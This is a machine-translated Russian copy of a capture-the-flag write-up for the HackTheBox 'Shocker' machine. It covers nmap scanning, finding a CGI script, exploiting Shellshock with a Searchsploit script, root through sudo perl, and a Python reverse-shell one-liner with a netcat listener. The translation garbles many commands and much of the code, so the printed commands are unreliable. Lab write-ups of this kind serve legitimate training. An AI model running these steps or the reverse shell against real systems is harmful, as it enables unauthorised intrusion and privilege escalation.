Рубрики
Без рубрики

Разрешение: Hackthebox Shocker- Без метасплота (OSCP Prep)

Привет всем, вещи стали немного серьезными, так как я купил свою попытку сертификации OSCP. Так что я… Помечено кибербезопасностью, безопасностью, WebDev, Python.

Всем привет,

Вещи стали немного серьезными, так как я купил свою попытку сертификации OSCP. Поэтому я надеюсь, что в течение следующих 2 недель я выпущу больше записей HTB.

Давай начнем!!

Команда:

NMAP -SC -SV -T4 -On nmap.txt -VVV 10.10.10.56

  1. -SC Сценарии
  2. -SV открытые порты для определения информации об обслуживании/версиях
  3. -T4 Время для более быстрого вывода (0-5)
  4. -На сохранить его в файл
  5. -VVV разные уровни и приведут к тому, что NPNING будет распечатать больше информации во время выполнения. Больше чтения связь

Порт открывается:

  1. 80 TCP http
  2. 2222 TCP SSH

Давайте запустим полное сканирование порта, чтобы увидеть, пропустили ли мы что -нибудь здесь.

Команда:

nmap -p- -на Allports.txt 10.10.10.56

Так что ничто другое на самом деле не возвращается, что является обломом.

Давайте попробуем запустить быстрое сканирование Vuln только для ударов.

Команда:

nmap – -сценарист vuln -on vuln.txt 10.10.10.56

Ничто здесь не появляется ко мне, поэтому давайте перейдем к сайту, так что давайте посмотрим на источник.

Щелкните правой кнопкой мыши

Я ударил несколько закусок с Дирб Итак, я собираюсь использовать Dirbuster Анкет

Из неровных окон выполняются следующие.

Команда:

Dirbuster Это должно занять минуту, затем открыть новый терминал.

Ключевые предметы, чтобы обратить внимание на: Целевой URL Файл со списком Dirs/Files Расширение файла

Похоже, мы нашли файл user.sh На машине, к которой мы могли бы получить доступ.

Вы можете щелкнуть правой кнопкой мыши или вручную перейти к нему на веб -странице.

Итак, после изучения /cgi-bin/ И название коробки, кажется, можно ударить Shellshock.

Команда:

NMAP -SV -P80 -Скрипт HTTP -ShellShock – -Script -Args 10.10.10.56

Как я узнал, чтобы использовать это? Nmap связь

Теперь, когда мы знаем, что у нас есть путь, давайте перейдем к Searchsploit Анкет

Команда:

SearchSploit Shellshock

Я иду с этим, потому что это инъекция RCE, которая также является сценарием Python. Другие перечисленные – это файлы TXT, которые мне немного приколили.

Используйте CP Команда для скопирования эксплойта в местоположение вашего файла или найти его в репозиции Exploit-DB и загрузите его.

Хорошо, давайте посмотрим на код эксплойта.

Команда:

nano exploit.py

Если вы прокрутите вниз, у вас есть некоторые варианты, как запустить эксплойт, не изменяя его.

Чтобы подтвердить, вы можете запустить код тестирование.

Команда:

Python exploit.py

Команда:

Python exploit.py.10.10.56 Pages =/cgi-bin/user.sh

Команда:

лауреат

Ницца!

Здесь мы посмотрим, что мы можем сделать с Sudo.

Команда:

Sudo -l

Похоже, мы можем Корень без пароля из /usr/bin/perl место нахождения.

Направляясь в Google, чтобы подтвердить мое мышление.

Также Hackingarticlics Предоставляет действительно отличный ресурс для Comands связь

Команда:

sudo perl -e ‘Exec “/bin/bash”;’ id кто я

Команда:

wc root.txt

Еще один способ сделать это для более стабильной оболочки!

После первоначального доступа на машине.

Команда:

который Python3

Отсюда отправляйтесь в Полезное нагрузка все, что GitHub связь

Команда:

python -c ‘import.socket (сокет. Af_inet, гнездо. Sock_stream); s.connect ((“10.0.0.1”, 4242)); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); импорт pty; pty.spawn (“/bin/bash”) ‘

Обновите IP -адрес к вашему Адрес TUN0 Анкет

Используйте команду выше!

Перед нажатием ввода откройте Netcat в другом окне.

Команда:

NC -NVLP 1234

Теперь мы можем запустить тот же Priv ESC, что и раньше. На этот раз мы будем в более стабильном экземпляре!

Путь, чтобы пойти, ты получил это !!

Оригинал: “https://dev.to/0xhuey/writeup-hackthebox-shocker-without-metasploit-oscp-prep-1mnh”